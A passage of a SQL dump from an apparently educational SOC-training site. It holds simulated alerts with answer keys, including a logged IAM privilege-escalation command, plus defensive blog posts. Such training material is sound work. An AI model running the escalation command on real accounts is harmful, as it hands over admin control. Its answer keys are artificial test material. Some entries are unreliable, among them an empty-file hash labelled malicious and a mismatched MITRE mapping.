'Intermediate', 'SIEM', 5, 1, 'OT_ICS'),
(755, 'Exposed AWS S3 Bucket Detected', 'high', 'AWS GuardDuty', 'An S3 bucket was found to be publicly accessible, potentially exposing sensitive data. Immediate action is required to secure data.', 'Data Exfiltration', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"bucket_access\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"\",\"username\":\"user123\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"\",\"command_line\":\"\",\"bucket_name\":\"sensitive-data-bucket\",\"access_policy\":\"public-read\"}', '2026-01-10 02:30:01', '2026-01-11 15:13:17', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 142 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"bucket_name\",\"value\":\"sensitive-data-bucket\",\"is_critical\":true,\"osint_result\":{\"source\":\"AWS Config\",\"verdict\":\"internal\",\"details\":\"Exposed bucket found on AWS\"}}],\"expected_actions\":[\"block_ip\",\"secure_bucket\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The public access policy on the S3 bucket is a clear indicator of misconfiguration leading to potential data exposure.\"}', 'Beginner', 'DLP', 3, 1, 'OT_ICS'),
(756, 'Unauthorized IAM Privilege Escalation Attempt', 'critical', 'AWS CloudTrail', 'An IAM user attempted to escalate privileges without authorization, indicating potential account compromise.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:20:00Z\",\"event_type\":\"iam_policy_change\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"\",\"username\":\"compromised_user\",\"hostname\":\"iam.amazonaws.com\",\"request_body\":\"\",\"command_line\":\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\",\"policy_name\":\"AdminAccess\"}', '2026-01-11 09:24:16', '2026-01-11 15:13:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 560 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"IAM user account detected with unauthorized privilege escalation attempt\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"audit_user_activity\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command to escalate IAM privileges combined with the source IP\'s reputation indicates a compromise attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE'),
(757, 'Suspicious Lambda Function Execution', 'medium', 'AWS Security Hub', 'A Lambda function executed with unexpected parameters, indicating potential misuse for crypto mining activities.', 'Resource Hijacking', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"lambda_execution\",\"src_ip\":\"192.0.2.44\",\"dst_ip\":\"\",\"username\":\"lambda_user\",\"hostname\":\"lambda.amazonaws.com\",\"request_body\":\"function: crypto_mine\",\"command_line\":\"\"}', '2026-01-10 07:51:32', '2026-01-11 15:13:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP previously associated with crypto mining pools\"}},{\"id\":\"artifact_2\",\"type\":\"request_body\",\"value\":\"function: crypto_mine\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Unexpected function parameter for crypto mining detected\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"disable_function\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"resource_hijacking\",\"analysis_notes\":\"The execution of a Lambda function for crypto mining suggests resource hijacking, especially given the IP’s history.\"}', 'Beginner', 'EDR', 3, 1, 'FINANCE');
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(758, 'False Positive: Unusual Login Attempt from Known Safe VPN', 'low', 'Azure Sentinel', 'A login attempt from a foreign IP was flagged as suspicious, but investigation reveals it is a known safe VPN used by the employee.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"\",\"username\":\"employee_vpn_user\",\"hostname\":\"login.microsoftonline.com\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":3}', '2026-01-10 04:12:19', '2026-01-11 15:13:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":false,\"osint_result\":{\"source\":\"IPQualityScore\",\"verdict\":\"clean\",\"details\":\"IP belongs to a known safe VPN provider used by the employee\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"employee_vpn_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account verified to use this VPN regularly\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is associated with a legitimate VPN used by the employee, explaining the foreign login attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'),
(759, 'AWS S3 Bucket Exposed to Public', 'high', 'AWS GuardDuty', 'An AWS S3 bucket has been detected with public read permissions enabled, potentially exposing sensitive data.', 'Data Exposure', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"configuration_change\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"N/A\",\"username\":\"admin@example.com\",\"hostname\":\"aws-s3-bucket\",\"request_body\":\"PUT /public-access-block\",\"command_line\":\"N/A\"}', '2026-01-09 23:33:08', '2026-01-11 15:13:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"admin@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Administrative user account for AWS management\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"PUT /public-access-block\",\"is_critical\":true,\"osint_result\":{\"source\":\"AWS Documentation\",\"verdict\":\"suspicious\",\"details\":\"Public access block configuration change detected\"}}],\"expected_actions\":[\"close_alert\",\"audit_configuration\",\"notify_admin\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The S3 bucket was configured with public access, posing a risk of data exposure.\"}', 'Novice', 'DLP', 1, 1, 'FINANCE'),
(760, 'Multiple Failed Login Attempts Detected', 'medium', 'Splunk', 'A foreign IP address has been detected making multiple failed login attempts to the AWS console.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"N/A\",\"username\":\"j.doe@example.com\",\"hostname\":\"aws-console\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-01-10 09:16:29', '2026-01-11 15:13:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.doe@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account for AWS console access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is associated with known malicious activity and attempted unauthorized access.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT'),
(761, 'Malicious File Executed on Azure VM', 'critical', 'Microsoft Defender for Cloud', 'A known malicious file was executed on an Azure Virtual Machine, indicating a potential compromise.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.4\",\"dst_ip\":\"N/A\",\"username\":\"vm-user\",\"hostname\":\"azure-vm-01\",\"request_body\":\"N/A\",\"command_line\":\"C:\\\\malware\\\\badfile.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-09 15:49:24', '2026-01-11 15:13:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected by 50+ antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\badfile.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Known malicious executable\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file executed is a known malicious program, posing a threat to the system.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'),
(762, 'Unusual Spike in Cloud Resource Usage', 'low', 'AWS CloudWatch', 'An unusual increase in compute resources was detected in AWS, suggesting potential crypto mining activity.', 'Anomaly', 'T1496', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:00:00Z\",\"event_type\":\"resource_usage\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"N/A\",\"username\":\"aws-user\",\"hostname\":\"aws-ec2-instance\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-01-11 03:05:12', '2026-01-11 15:13:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the cloud instance\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"aws-user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"AWS user account managing the instance\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly\",\"analysis_notes\":\"The increased resource usage is attributed to a legitimate workload spike by the user.\"}', 'Novice', 'CLOUD', 1, 1, 'FINANCE');

-- --------------------------------------------------------

--
-- Table structure for table `alert_grades`
--

DROP TABLE IF EXISTS `alert_grades`;
CREATE TABLE `alert_grades` (
  `id` int(11) NOT NULL,
  `alert_id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `grade` int(11) DEFAULT NULL,
  `feedback` text DEFAULT NULL,
  `graded_by` int(11) DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `badges`
--

DROP TABLE IF EXISTS `badges`;
CREATE TABLE `badges` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `description` text DEFAULT NULL,
  `icon_url` varchar(255) DEFAULT NULL,
  `badge_type` enum('path_completion','milestone','streak','special') DEFAULT 'milestone',
  `criteria` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL CHECK (json_valid(`criteria`)),
  `xp_reward` int(11) DEFAULT 0,
  `created_at` timestamp NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `badges`
--

INSERT INTO `badges` (`id`, `name`, `description`, `icon_url`, `badge_type`, `criteria`, `xp_reward`, `created_at`) VALUES
(1, 'First Steps', 'Completed your first task in the learning path', NULL, 'milestone', NULL, 50, '2025-12-26 00:33:07'),
(2, 'Linux Novice', 'Completed the Linux Fundamentals module', NULL, 'path_completion', NULL, 200, '2025-12-26 00:33:07'),
(3, 'Windows Explorer', 'Completed the Windows Fundamentals module', NULL, 'path_completion', NULL, 200, '2025-12-26 00:33:07'),
(4, 'Network Navigator', 'Completed the Networking Essentials module', NULL, 'path_completion', NULL, 200, '2025-12-26 00:33:07'),
(5, 'Security Foundations', 'Completed the Pre-Security Fundamentals path', NULL, 'path_completion', NULL, 500, '2025-12-26 00:33:07');

-- --------------------------------------------------------

--
-- Table structure for table `blog_posts`
--

DROP TABLE IF EXISTS `blog_posts`;
CREATE TABLE `blog_posts` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `slug` varchar(255) NOT NULL,
  `content` longtext DEFAULT NULL,
  `excerpt` text DEFAULT NULL,
  `featured_image` varchar(1024) DEFAULT NULL,
  `featured_image_alt` varchar(255) DEFAULT NULL,
  `author_id` int(11) DEFAULT NULL,
  `status` enum('published','draft') DEFAULT 'draft',
  `created_at` datetime DEFAULT current_timestamp(),
  `updated_at` datetime DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `category` varchar(100) DEFAULT NULL,
  `seo_title` varchar(255) DEFAULT NULL,
  `seo_description` text DEFAULT NULL,
  `focus_keyword` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `blog_posts`
--

INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(1, 'IoT and the Modern Home: How to Stay Safe in a Connected World', 'iot-and-the-modern-home-how-to-stay-safe-in-a-connected-world', '# The Reality of the Connected Home\n\nThe connected home is no longer a futuristic concept—it\'s a reality. From smart locks and thermostats to cameras and refrigerators, the Internet of Things (IoT) has transformed how we live, work, and interact with our environment. However, behind this convenience lies a growing threat: every connected device is a potential entry point for cyberattacks.\n\nToday\'s smart homeowner isn\'t just managing gadgets—they\'re managing risk. Understanding these risks is the first step toward securing what matters most.\n\n## The Rise (and Risk) of the Smart Home\n\nSmart homes promise simplicity: lights that learn daily routines, security systems that respond automatically, and voice assistants that anticipate needs. But the same connections that make life easier can also open digital doors to intruders.\n\nStudies show that up to 80% of consumer IoT devices contain known vulnerabilities, and attacks targeting smart homes increased by more than 100% year over year in 2024. Mass adoption has moved faster than security awareness and regulation.\n\n### Why IoT Devices Are So Vulnerable\n\nMost IoT devices are designed for affordability and convenience, not security. Common issues include default credentials, unpatched firmware, weak or missing encryption, and the lack of unified security standards.\n\nEven basic devices like smart plugs, TVs, and routers can become the weakest link. Once compromised, attackers can move laterally and gain control of the entire home network.\n\n### Real-World Threats from Compromised Devices\n\nSmart home breaches are real and damaging. Hackers have hijacked cameras and baby monitors, exposed private routines through energy data, recruited devices into botnets like Mirai, and permanently disabled hardware through malicious firmware.\n\nEvery connected device can act as both a helper and a hazard.\n\n## Convenience vs. Security\n\nMost users assume smart devices are secure by default, yet the majority report low confidence in IoT security. While many say they would pay more for safer devices, manufacturers still prioritize features and speed to market over security by design.\n\nAs a result, responsibility often falls on users who are least equipped to manage complex security risks.\n\n## How to Secure Your Smart Home\n\nSecuring a smart home does not require expert knowledge. Key steps include:\n\n- Changing default passwords\n- Keeping firmware updated\n- Segmenting IoT devices on separate networks\n- Using WPA3 encryption\n- Enabling multi-factor authentication\n- Choosing reputable manufacturers\n- Limiting unnecessary permissions\n\nSmall, consistent actions significantly reduce risk.\n\n## The Future of Smart Home Security\n\nAI-driven anomaly detection, zero-trust models, blockchain-based authentication, and quantum-resistant encryption are shaping the future of IoT security. Regulatory efforts like the EU Cyber Resilience Act, UK PSTI Act, and U.S. Cyber Trust Mark are improving accountability, while standards such as Matter and ETSI EN 303 645 aim to unify security practices.\n\nStill, education and awareness remain the strongest defense.\n\n## Security Is the True Smart Choice\n\nA connected home can be both convenient and secure, but only with intentional choices. From password hygiene to device selection, every decision impacts safety.\n\nSmart homes represent progress—but without cybersecurity awareness, progress quickly becomes exposure. Protecting your IoT ecosystem ensures your home remains smart in every sense of the word.', '', 'http://infoseclabs.io/uploads/1767472026759-342558123.jpeg', NULL, 1, 'published', '2026-01-03 07:21:00', '2026-01-03 23:27:20', 'IoT Security', 'Securing Your Connected Home: Risks & Solutions', 'Explore the risks of IoT in smart homes and learn effective measures to enhance your home\'s security.', 'smart home security'),
(2, 'Understanding DDoS Attacks: Protecting Your Digital Infrastructure', 'understanding-ddos-attacks-protecting-your-digital-infrastructure', '# Understanding Distributed Denial-of-Service (DDoS) Attacks\n\nDistributed Denial-of-Service (DDoS) attacks are among the most severe threats in today’s digital landscape. They can cripple businesses, disrupt critical infrastructure, and prevent users from accessing essential online services. Understanding how these attacks work, the tools attackers use, and how to mitigate them is essential for protecting digital assets.\n\nThis article explains the fundamentals of DDoS attacks, common attack types, attacker tools, and effective mitigation strategies. By the end, you will be able to recognize, respond to, and reduce the impact of DDoS attacks.\n\n## Introduction to DDoS Attacks\n\nA Distributed Denial-of-Service (DDoS) attack overwhelms a target, such as a website, server, or network, with massive traffic. This disrupts normal operations and makes services unavailable to legitimate users.\n\n## Types of DDoS Attacks\n\n### Volumetric Attacks\n\nThese attacks consume bandwidth by flooding the network with large volumes of traffic, blocking legitimate access.\n\n### Protocol Attacks\n\nThese exploit weaknesses in network protocols such as TCP or SYN to exhaust server resources.\n\n### Application Layer Attacks\n\nThese target specific applications or services, overwhelming them with requests until they fail.\n\n## Impact of DDoS Attacks\n\nDDoS attacks can cause revenue loss, reputational damage, reduced user trust, and regulatory penalties. In 2020, AWS mitigated a record-breaking 2.3 Tbps DDoS attack, demonstrating the scale these attacks can reach.\n\n## Common DDoS Attack Methods\n\n### Volumetric Attacks\n\nExamples include UDP floods and DNS amplification attacks that generate massive traffic.\n\n### Protocol Attacks\n\nAttacks such as SYN floods and Ping of Death exploit protocol behavior to crash systems.\n\n### Application Layer Attacks\n\nAlso known as Layer 7 attacks, these include HTTP GET and POST floods targeting web services.\n\n## Tools Used in DDoS Attacks\n\n### Botnets\n\nNetworks of compromised devices controlled by attackers to generate large-scale traffic.\n\n### Stresser Services\n\nPaid services that allow users to launch DDoS attacks under the guise of stress testing.\n\n### Reflection Techniques\n\nAttackers use third-party servers to amplify traffic toward the victim.\n\n## Recognizing a DDoS Attack\n\nEarly detection reduces damage.\n\n### Common Symptoms\n\n- Slow or unavailable websites or services\n- Sudden traffic spikes from unusual locations\n- High network latency\n\n### Detection Methods\n\n- Traffic analysis\n- AI-based anomaly detection\n- Server log analysis\n\n## DDoS Mitigation Strategies\n\nAlthough prevention is difficult, the impact can be reduced.\n\n### Prevention Measures\n\n- Firewalls and intrusion prevention systems\n- Load balancers\n- Content delivery networks (CDNs)\n\n### Traffic Shaping\n\nPrioritizes legitimate traffic over malicious requests.\n\n## Real-World DDoS Case Studies\n\n### GitHub (2018)\n\nA 1.35 Tbps memcached amplification attack mitigated within minutes.\n\n### Dyn DNS (2016)\n\nA Mirai botnet attack disrupted major platforms such as Twitter and Netflix.\n\n### AWS (2020)\n\nA 2.3 Tbps attack highlighted the need for advanced mitigation systems.\n\n## Future Trends in DDoS Attacks\n\n### Increased IoT Exploitation\n\nMore vulnerable devices will expand botnet size.\n\n### AI-Driven Attacks\n\nAI may enable more adaptive and stealthy DDoS techniques.\n\n### Ransom DDoS (RDoS)\n\nAttackers demand payment to stop ongoing attacks.\n\n## Strengthen Your Security Today\n\nDDoS attacks continue to evolve and affect organizations of all sizes. By understanding attack methods, recognizing warning signs, and applying strong mitigation strategies, organizations can significantly reduce their exposure and impact.', '', 'http://infoseclabs.io/uploads/1767474329590-745685715.jpg', NULL, 1, 'published', '2026-01-03 16:01:00', '2026-01-04 00:05:43', 'Information Security', 'Understanding DDoS Attacks & Mitigation', 'Learn about DDoS attacks, methods, tools, and effective strategies to protect your digital assets from one of the biggest online threats.', 'DDoS Attacks'),
(3, 'Exploring Zero Trust: Why \'Trust but Verify\' is No Longer Enough', 'exploring-zero-trust-why-trust-but-verify-is-no-longer-enough', '# Understanding Zero Trust Architecture\n\nCybersecurity threats are becoming more sophisticated, and traditional perimeter-based security models are no longer sufficient. Zero Trust Architecture assumes that breaches can happen at any time and requires continuous verification. This shift has changed how organizations protect their digital assets.\n\nThis article explains Zero Trust Architecture, its core principles, implementation levels, and practical tools. It also uses the \"Security Onion\" analogy to simplify the concept.\n\n## Introduction to Zero Trust Architecture\n\nZero Trust is a security model where no user, device, or application is trusted by default, whether inside or outside the network. Every access request must be verified.\n\nIts importance lies in the principle of \"never trust, always verify.\" With cloud services, remote work, and mobile devices, Zero Trust provides layered protection across the entire infrastructure.\n\nTraditional models rely on a secure perimeter, granting broad access once inside. Zero Trust removes this assumption and enforces verification at every step, reducing both internal and external risks.\n\n## Core Principles of Zero Trust\n\n### Never Trust, Always Verify\n\nEvery request must be authenticated and validated before access is granted.\n\n### Least Privilege Access\n\nUsers receive only the access required to perform their tasks, minimizing exposure.\n\n### Assume Breach\n\nOrganizations operate as if a breach has already occurred, enabling continuous monitoring and rapid response.\n\n## Levels of Zero Trust Implementation\n\n### User Identity\n\nStrong identity verification using IAM solutions such as Okta or Microsoft Azure AD.\n\n### Devices and Endpoints\n\nAll devices are verified and monitored using endpoint security tools like CrowdStrike or SentinelOne.\n\n### Network\n\nMicrosegmentation limits lateral movement within the network using platforms such as Illumio or Cisco Secure Workload.\n\n### Applications\n\nApplications are protected with access controls and monitoring tools like Zscaler and Netskope.\n\n### Data\n\nData is secured through encryption, classification, and strict access controls.\n\n## Security Onion Analogy\n\nZero Trust can be visualized as layers of an onion. At the center are people, surrounded by layers including the perimeter, network, endpoints, data, and organizational policies. Each layer strengthens the next, creating a comprehensive defense model.\n\n## Tools and Technologies for Zero Trust\n\n- **Identity and Access Management (IAM)** solutions manage user identities.\n- **Multi-Factor Authentication (MFA)** strengthens authentication.\n- **Microsegmentation** limits network access.\n- **Endpoint Detection and Response (EDR)** provides visibility into device activity.\n\n## Implementing Zero Trust\n\n### Assessment\n\nIdentify assets, risks, and vulnerabilities.\n\n### Planning\n\nDefine a Zero Trust strategy and select appropriate tools.\n\n### Implementation\n\nDeploy controls gradually, starting with critical systems.\n\n### Monitoring\n\nContinuously monitor activity and automate responses.\n\n## Why Zero Trust Is the Future\n\nZero Trust Architecture is essential as cyber threats continue to evolve. It provides proactive, layered security and ensures continuous verification across all systems. Organizations that adopt Zero Trust improve resilience, reduce risk, and prepare for future challenges.', '', 'http://infoseclabs.io/uploads/1767474556038-82386573.png', NULL, 1, 'published', '2026-01-01 00:08:00', '2026-01-04 00:10:27', 'Information Security', 'Exploring Zero Trust: Secure Beyond \'Trust but Verify\'', 'Learn why Zero Trust surpasses \'Trust but Verify\' in cybersecurity, focusing on core principles and practical tools for robust security.', 'Zero Trust'),
(4, 'Overcoming Alarm Fatigue: How to Manage Security Alerts Effectively', 'overcoming-alarm-fatigue-how-to-manage-security-alerts-effectively', '# Mastering Security Alarm Management: A Guide to Effective Alert Triage\n\nWhen was the last time your security team investigated an alarm and discovered its actual cause? Security alarms are more than just annoying alerts; they are breadcrumbs along a trail left by potential attackers. Yet, too often, organizations fall prey to the \"cry wolf\" syndrome, becoming desensitized to alarms and missing signs of real danger.\n\nThe stakes couldn’t be higher. Responding to every alarm can overwhelm a team, but ignoring them completely could lead to disastrous consequences. This guide will walk you through the harsh reality of alert fatigue and provide actionable methods for effective triage to ensure you stay vigilant without drowning.\n\n## What is Alarm Fatigue?\n\nAlarm fatigue occurs when security analysts receive an overwhelming number of alarms, leading them to ignore or deprioritize notifications. When you are bombarded by 500 alerts a day, the 501st—the one that actually matters—can easily be lost in the noise.\n\n## The Harsh Reality of the SOC\n\n- **85% of security alerts are false positives**, according to research by the Ponemon Institute.\n- Analysts only investigate **56% of alerts** on average, leaving thousands of potential threats unaddressed.\n- **Burnout is real**: Over 70% of analysts with less than five years of experience face turnover risks due to the high-stress environment of unmanaged alerts.\n\n## A 5-Step Framework for Effective Alert Triage\n\nAs a new professional, you need a repeatable process. Don\'t just \"click through\" alerts—investigate them strategically.\n\n### 1. Smart Alert Grouping\n\nStop investigating alerts in isolation. Use your SIEM or SOAR to cluster related signals—such as multiple failed logins followed by a successful one from the same IP. This transforms \"noise\" into a \"story.\"\n\n### 2. Contextual Enrichment\n\nA raw alert (e.g., \"SQL Injection attempt\") is useless without context. Ask:\n\n- Is the target a critical production server or a test lab?\n- Does the server even run SQL? If not, it’s a low-priority false positive.\n- Is this the user\'s standard behavior or a sudden anomaly?\n\n### 3. Risk-Based Prioritization\n\nNot all alerts are equal. Use a scoring system that considers the criticality of the asset and the severity of the threat. Focus on level 1 (critical) threats first, and handle level 3 (low-priority) during regular business hours.\n\n### 4. Focused Investigation Path\n\nFollow defined Runbooks or Playbooks. For an authentication alert, your path should always include verifying MFA usage and checking IP reputation via tools like VirusTotal.\n\n### 5. The Feedback Loop (Tuning)\n\nThis is the most critical step for a new professional. If you identify a persistent false positive—like a nightly backup script triggering a \"mass file move\" alert—document it and work with your security engineers to tune the rule or set a suppression threshold.\n\n## Professional Advice for Your First 90 Days\n\n- **Automate the Mundane**: Use automation for repetitive tasks like IP lookups and indicator extraction so you can focus on human-centric analysis.\n- **Know Your Baseline**: You can\'t spot an outlier if you don\'t know what \"normal\" looks like in your specific network.\n- **Collaborate**: Don\'t be afraid to ask a senior analyst for a second opinion on complex alerts.\n\n## Conclusion\n\nIgnored alarms mean missed opportunities to stop an attack in its early stages. By implementing a structured triage framework and focusing on alert quality over quantity, you protect not only your organization but also your own professional longevity.', '', 'http://infoseclabs.io/uploads/1767481096256-421379954.jpg', NULL, 1, 'published', '2026-01-04 01:56:00', '2026-01-04 18:03:00', 'Information Security', 'Managing Security Alerts: Overcome Alarm Fatigue', 'Learn strategies to combat alarm fatigue and effectively manage security alerts, ensuring no threat goes undetected.', 'Alarm Fatigue'),
(5, 'Why Traditional Antivirus Falls Short in Today\'s Cybersecurity Landscape', '', '# The Evolution of Endpoint Protection: Beyond Traditional Antivirus\n\nCyberattacks are becoming increasingly sophisticated, targeting vulnerabilities with precision and speed. For years, traditional antivirus solutions have been the backbone of endpoint protection. However, as the cybersecurity landscape evolves, so do the tactics of attackers. Today, conventional antivirus software is struggling to keep pace with zero-day exploits and advanced threats. Enter Endpoint Detection and Response (EDR), the next line of defense and perhaps the future of endpoint security.\n\nIn this blog, we’ll explore why signature-based antivirus solutions fall short in combating modern threats and how EDR rises to the challenge with behavior-driven detection. By the end, you’ll understand why it may be time to upgrade your endpoint security strategy.\n\n## The Problem with Traditional Antivirus\n\nFor decades, antivirus software has relied heavily on signature-based detection. But what does that mean, and why is it no longer sufficient?\n\n### How Signature-Based Detection Works\n\nTraditional antivirus tools operate by detecting known patterns or \"signatures\" in malicious files. When a file matches a database of suspicious signatures, it gets flagged and quarantined. This strategy worked exceptionally well in an era when malware evolved slowly, and attacks were less sophisticated.\n\nHowever, modern threats have outgrown this method. Here’s why signature-based detection is falling behind:\n\n- **Zero-Day Exploits:** Cybercriminals exploit vulnerabilities that vendors are unaware of, making signature databases irrelevant in the face of these unknown threats.\n  \n- **Polymorphic Malware:** Modern malware can modify its code to avoid detection, rendering signatures ineffective.\n  \n- **Sophisticated Attacks:** Hackers now use complex, multi-vector attacks that traditional antivirus cannot analyze comprehensively.\n\nThe result? Relying purely on antivirus creates significant blind spots in your security strategy, leaving your organization vulnerable to evolving threats.', '', 'http://infoseclabs.io/uploads/1767482620674-705801876.png', NULL, 1, 'published', '2025-12-30 10:18:00', '2026-01-04 18:18:06', 'Information Security', 'Overcoming Alert Overload in Cybersecurity', 'Discover how EDR surpasses traditional antivirus in tackling modern cyber threats. Upgrade your security strategy today.', 'Endpoint Protection'),
(6, 'Elevate Your Cybersecurity Skills with Kasm Workspaces: A Comprehensive Guide', 'elevate-your-cybersecurity-skills-with-kasm-workspaces-a-comprehensive-guide', '# Kasm Workspaces for Cybersecurity Professionals\n\nThe world of cybersecurity is vast, continuously evolving, and demanding. Whether you\'re a seasoned professional or a budding enthusiast, having the right tools can be a game-changer. One such tool that\'s been making waves in the cybersecurity community is Kasm Workspaces. But what exactly is it, and how can you incorporate it into your home lab to enhance your skills and security? This blog will answer these questions and guide you through using Kasm Workspaces as a cybersecurity professional.\n\n## What is Kasm Workspaces?\n\n### Overview of Kasm Workspaces\n\nKasm Workspaces is a modern, container-based virtual desktop infrastructure (VDI) platform designed to create isolated environments for safe browsing, application deployment, remote work, and more. Unlike traditional VDIs, Kasm Workspaces utilizes lightweight containers, such as Docker, to provide scalable and secure access to virtualized environments.\n\nWhether you need to run a browser in a sandboxed environment, analyze suspicious files isolated from your main machine, or simply access a secure workspace remotely, Kasm Workspaces 